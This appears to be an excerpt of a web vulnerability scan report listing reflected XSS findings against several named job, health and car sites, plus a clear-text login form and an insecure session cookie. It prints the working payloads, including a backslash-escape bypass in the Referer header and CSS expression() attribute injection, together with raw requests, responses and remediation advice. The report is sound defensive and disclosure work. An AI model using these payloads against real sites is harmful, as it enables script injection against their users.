Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?siteid=cbsubnav HTTP/1.1
Host: www.cbsalary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2c892\'%3balert(1)//157cc6ae305
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 30546
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=6b6a4b6151a7497a822f6e3b1bbd1ac9-343075068-VK-4; domain=.cbsalary.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650AC7EA04ECCDFCA938426DBD3F67F957851EFD2630916E8F623FBE2F8C1807DAB0579D0C74890C42E; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:37:48 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 14 Nov 2010 23:37:47 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Salary ...[SNIP]... l='CBSalary'; s_cb.prop1='Home'; s_cb.eVar8='CBSalary - Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 2c892\\';alert(1)//157cc6ae305'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5cfb\'%3balert(1)//dbd7525218b was submitted in the Referer HTTP header. This input was echoed as a5cfb\\';alert(1)//dbd7525218b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped: doing the replacements in the other order doubles the backslash that was added for the quotation mark and reintroduces the flaw. Line terminators and the sequence </ should be escaped as well, so that the string cannot be ended by a newline and the enclosing script block cannot be closed by </script>.
Request
GET /salary-calculator.aspx HTTP/1.1 Host: www.cbsalary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a5cfb\'%3balert(1)//dbd7525218b
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41552 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=2f6a939c36a346b48e3f10f529177413-343075137-RD-4; domain=.cbsalary.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6502A9657836CC74821965A6585DA6C2FCFF1BC4BFFAC9AD1DFF38417B3023048F50980D7A080B26064; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:38:57 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL13 Date: Sun, 14 Nov 2010 23:38:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
s_cb.prop1='Calc_Salary'; s_cb.eVar8='CBSalary - Calc_Salary'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - a5cfb\\';alert(1)//dbd7525218b'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c331\'%3balert(1)//ef3a7678535 was submitted in the Referer HTTP header. This input was echoed as 3c331\\';alert(1)//ef3a7678535 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped: doing the replacements in the other order doubles the backslash that was added for the quotation mark and reintroduces the flaw. Line terminators and the sequence </ should be escaped as well, so that the string cannot be ended by a newline and the enclosing script block cannot be closed by </script>.
Request
GET /salary-calculator.aspx?siteid=jrptop?sc_cmp1=JS_JR_CBSalTop HTTP/1.1 Host: www.cbsalary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=3c331\'%3balert(1)//ef3a7678535
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 41418 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=68c677c7d9f545e79c6a39372dccb761-343075211-R1-4; domain=.cbsalary.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC6501ADA673217DAA8E9B52124FB919A886C53B2E01159BECFB68E584CF6955E5B399D728E5D89FF8BAF; domain=.cbsalary.com; expires=Mon, 14-Nov-2011 23:40:11 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: REBEL1 Date: Sun, 14 Nov 2010 23:40:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
s_cb.prop1='Calc_Salary'; s_cb.eVar8='CBSalary - Calc_Salary'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 3c331\\';alert(1)//ef3a7678535'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a58d4\'%3balert(1)//325548f38c3 was submitted in the Referer HTTP header. This input was echoed as a58d4\\';alert(1)//325548f38c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped: doing the replacements in the other order doubles the backslash that was added for the quotation mark and reintroduces the flaw. Line terminators and the sequence </ should be escaped as well, so that the string cannot be ended by a newline and the enclosing script block cannot be closed by </script>.
Request
GET / HTTP/1.1 Host: www.kariera.gr Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a58d4\'%3balert(1)//325548f38c3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 80791 Content-Type: text/html; charset=UTF-8 Content-Language: el Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=e4e4be6802f54411ab0038acc80753ae-343075119-w8-6; domain=.kariera.gr; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650DF19A751D8395CC1170EB74F4726489984AEFF398FD767D38AF33A5BE86D2B98C69A95601F97295A; domain=.kariera.gr; expires=Mon, 14-Nov-2011 23:38:38 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR8 Date: Sun, 14 Nov 2010 23:38:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="el" lang="el"> <head><title> ............ ...[SNIP]... s_cb.prop1='GR Home Page'; s_cb.eVar8='JS_Home - GR Home Page'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - a58d4\\';alert(1)//325548f38c3'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 628be\'%3balert(1)//55e5ad7603c was submitted in the Referer HTTP header. This input was echoed as 628be\\';alert(1)//55e5ad7603c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped: doing the replacements in the other order doubles the backslash that was added for the quotation mark and reintroduces the flaw. Line terminators and the sequence </ should be escaped as well, so that the string cannot be ended by a newline and the enclosing script block cannot be closed by </script>.
Request
GET / HTTP/1.1 Host: www.miracleworkers.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=628be\'%3balert(1)//55e5ad7603c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 37818 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=360665844b694b2cb05589afd8c5f836-343075319-wc-6; domain=.miracleworkers.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC65064B3BC978D637492429AB4E98AB0447326E8FEA6FF9D6F760ED984C0A689C9A3A65ADCD1DC5438BE; domain=.miracleworkers.com; expires=Mon, 14-Nov-2011 23:41:59 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR13 Date: Sun, 14 Nov 2010 23:41:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Health ...[SNIP]... workers.com'; s_cb.channel='js_home'; s_cb.eVar8='js_home - '; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 628be\\';alert(1)//55e5ad7603c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd607\'%3balert(1)//ab073727a3c was submitted in the Referer HTTP header. This input was echoed as bd607\\';alert(1)//ab073727a3c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes, and this must be done before the quotation marks are escaped: doing the replacements in the other order doubles the backslash that was added for the quotation mark and reintroduces the flaw. Line terminators and the sequence </ should be escaped as well, so that the string cannot be ended by a newline and the enclosing script block cannot be closed by </script>.
Request
GET / HTTP/1.1 Host: www.personified.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=bd607\'%3balert(1)//ab073727a3c
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21355 Content-Type: text/html; charset=UTF-8 Content-Language: en-US Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml" Set-Cookie: CB%5FSID=3961e103eb734046a6e96ced5923619a-343075494-w9-6; domain=.personified.com; path=/; HttpOnly Set-Cookie: BID=X13ACF19327AEAC650EE943F0B9D2A61E0001302FED0AB3B2DB395E610AE6157B3DC7E7D91670452E8A9E11790CE1B74F4; domain=.personified.com; expires=Mon, 14-Nov-2011 23:44:53 GMT; path=/; HttpOnly X-Powered-By: ASP.NET X-PBY: BEAR9 Date: Sun, 14 Nov 2010 23:44:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Person ...[SNIP]... www.personified.com'; s_cb.eVar8='www.personified.com/PD/Default.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bd607\\';alert(1)//ab073727a3c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
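The backslash-escape bypass described in the Referer instances above, and the escaping the remediation detail asks for, as an added example that is not part of the scan report or of the scanned application. The shape of the tracking line, the payload and the echoed value are taken from the first cbsalary.com instance; the function names are this example's own, and the quote-only escaper is inferred from the behaviour the report describes, not recovered from the application.

```javascript
// Added example (not from the scan report): why escaping only the quote fails,
// and an escaper that closes the gap. Observed in the report:
//   payload (Referer, URL-encoded): a5cfb\'%3balert(1)//dbd7525218b
//   echoed:  s_cb.eVar16='natural (google) - a5cfb\\';alert(1)//dbd7525218b';

// Decoded form of the report's payload: a backslash, a quote, then ;alert(1)//
const REPORT_PAYLOAD = decodeURIComponent("a5cfb\\'%3balert(1)//dbd7525218b");

// Escaper inferred from the report's behaviour (assumption, not the app's code):
// quotes get a backslash, nothing else. The attacker's own backslash then
// consumes the one the server adds, and the quote ends the literal.
function escapeQuotesOnly(input) {
  return input.replace(/'/g, "\\'");
}

// Hardened escaper for a single-quoted JS string literal. Order matters: the
// backslash is escaped first, before any replacement that introduces one.
// Line terminators and "</" are handled so the literal cannot be ended by a
// newline and the enclosing <script> block cannot be closed by "</script>".
function escapeForJsSingleQuoted(input) {
  return input
    .replace(/\\/g, "\\\\")
    .replace(/'/g, "\\'")
    .replace(/\r/g, "\\r")
    .replace(/\n/g, "\\n")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029")
    .replace(/<\//g, "<\\/");
}

// Render the analytics line the way the page does: the referer-derived term is
// spliced into a single-quoted literal after a fixed prefix.
function renderTrackingScript(term, escaper) {
  return "s_cb.eVar16='natural (google) - " + escaper(term) + "';";
}

// Execute the rendered line with a stand-in alert() and s_cb object, and report
// whether the injected call ran and what the variable ended up holding.
function runSnippet(script) {
  const alertCalls = [];
  const s_cb = {};
  new Function("s_cb", "alert", script)(s_cb, (v) => alertCalls.push(v));
  return { alertCalls: alertCalls.length, eVar16: s_cb.eVar16 };
}

// Reproduces the report's echoed line with the weak escaper, then shows the fix.
function demo() {
  const vulnerable = renderTrackingScript(REPORT_PAYLOAD, escapeQuotesOnly);
  const fixed = renderTrackingScript(REPORT_PAYLOAD, escapeForJsSingleQuoted);
  return {
    vulnerableLine: vulnerable,
    vulnerableRun: runSnippet(vulnerable), // alert() fires once, value truncated
    fixedLine: fixed,
    fixedRun: runSnippet(fixed),           // no alert, payload stored verbatim
  };
}

console.log(demo());
```

With the weak escaper the rendered line is byte-for-byte the one in the report's response, the string literal ends after `a5cfb\`, and the stand-in `alert` is called; with the hardened escaper the whole payload, backslash and quote included, ends up inside `s_cb.eVar16` and nothing executes. A JSON encoder that also escapes `/` or `<` (or emitting the value as an HTML attribute and reading it from the DOM) is the simpler choice in most frameworks.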
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53943"style%3d"x%3aexpression(alert(1))"ef2ae5dae94 was submitted in the REST URL parameter 1. This input was echoed as 53943"style="x:expression(alert(1))"ef2ae5dae94 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on Internet Explorer's CSS expression() support, which was dropped from IE8 standards mode onward, and does not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go53943"style%3d"x%3aexpression(alert(1))"ef2ae5dae94/crp/buyingGuides/Story.jsp HTTP/1.1 Host: research.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 14 Nov 2010 22:31:20 GMT Location: http://www.cars.com/go53943"style="x:expression(alert(1))"ef2ae5dae94/crp/buyingGuides/Story.jsp X-Pad: avoid browser bug Server: Oracle9iAS/9.0.2 Apache Oracle9iAS-Web-Cache/9.0.2.2.0 (N) Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>301 Moved Permanently</TITLE> </HEAD><BODY> <H1>Moved Permanently</H1> The document has moved <A HREF="http://www.cars.com/go53943"style="x:expression(alert(1))"ef2ae5dae94/crp/buyingGuides/Story.jsp"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52a17"style%3d"x%3aexpression(alert(1))"18505d387d9 was submitted in the REST URL parameter 2. This input was echoed as 52a17"style="x:expression(alert(1))"18505d387d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on Internet Explorer's CSS expression() support, which was dropped from IE8 standards mode onward, and does not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/crp52a17"style%3d"x%3aexpression(alert(1))"18505d387d9/buyingGuides/Story.jsp HTTP/1.1 Host: research.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 14 Nov 2010 22:31:21 GMT Location: http://www.cars.com/go/crp52a17"style="x:expression(alert(1))"18505d387d9/buyingGuides/Story.jsp X-Pad: avoid browser bug Server: Oracle9iAS/9.0.2 Apache Oracle9iAS-Web-Cache/9.0.2.0.0 (N) Content-Length: 300 Content-Type: text/html; charset=iso-8859-1 Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>301 Moved Permanently</TITLE> </HEAD><BODY> <H1>Moved Permanently</H1> The document has moved <A HREF="http://www.cars.com/go/crp52a17"style="x:expression(alert(1))"18505d387d9/buyingGuides/Story.jsp"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e2e9"style%3d"x%3aexpression(alert(1))"c9171920ef1 was submitted in the REST URL parameter 3. This input was echoed as 5e2e9"style="x:expression(alert(1))"c9171920ef1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique relies on Internet Explorer's CSS expression() support, which was dropped from IE8 standards mode onward, and does not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /go/crp/5e2e9"style%3d"x%3aexpression(alert(1))"c9171920ef1/Story.jsp HTTP/1.1 Host: research.cars.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Sun, 14 Nov 2010 22:31:21 GMT Location: http://www.cars.com/go/crp/5e2e9"style="x:expression(alert(1))"c9171920ef1/Story.jsp Server: Oracle9iAS/9.0.2 Apache Oracle9iAS-Web-Cache/9.0.2.0.0 (N) Content-Length: 288 Content-Type: text/html; charset=iso-8859-1 Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>301 Moved Permanently</TITLE> </HEAD><BODY> <H1>Moved Permanently</H1> The document has moved <A HREF="http://www.cars.com/go/crp/5e2e9"style="x:expression(alert(1))"c9171920ef1/Story.jsp"> ...[SNIP]...
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://www.evenflo.com/login.aspx
The form contains the following password field:
ctl00$phMainContent$Login1$Password
Issue background
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (TLS; SSL is obsolete and should not be offered) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP. Serving the login page itself over HTTPS and sending an HTTP Strict-Transport-Security header stops the browser from making clear-text requests at all, so the form cannot be rewritten by an attacker on the path before the credentials are sent.
Request
GET /login.aspx HTTP/1.1 Host: www.evenflo.com Proxy-Connection: keep-alive Referer: http://www.evenflo.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=ocz1hqfc13zpwujpj3hjkbmi; otmData=languagePref=en-us; Linkshare.PPC=u1=Organic; Amazon.PPC=tag=evenfloSEO-20; __utmz=17189485.1289784078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=17189485.2106858154.1289784078.1289784078.1289784078.1; __utmc=17189485; __utmb=17189485.1.10.1289784078
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 01:21:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 33835
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The following cookie was issued by the application and does not have the secure flag set:
JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
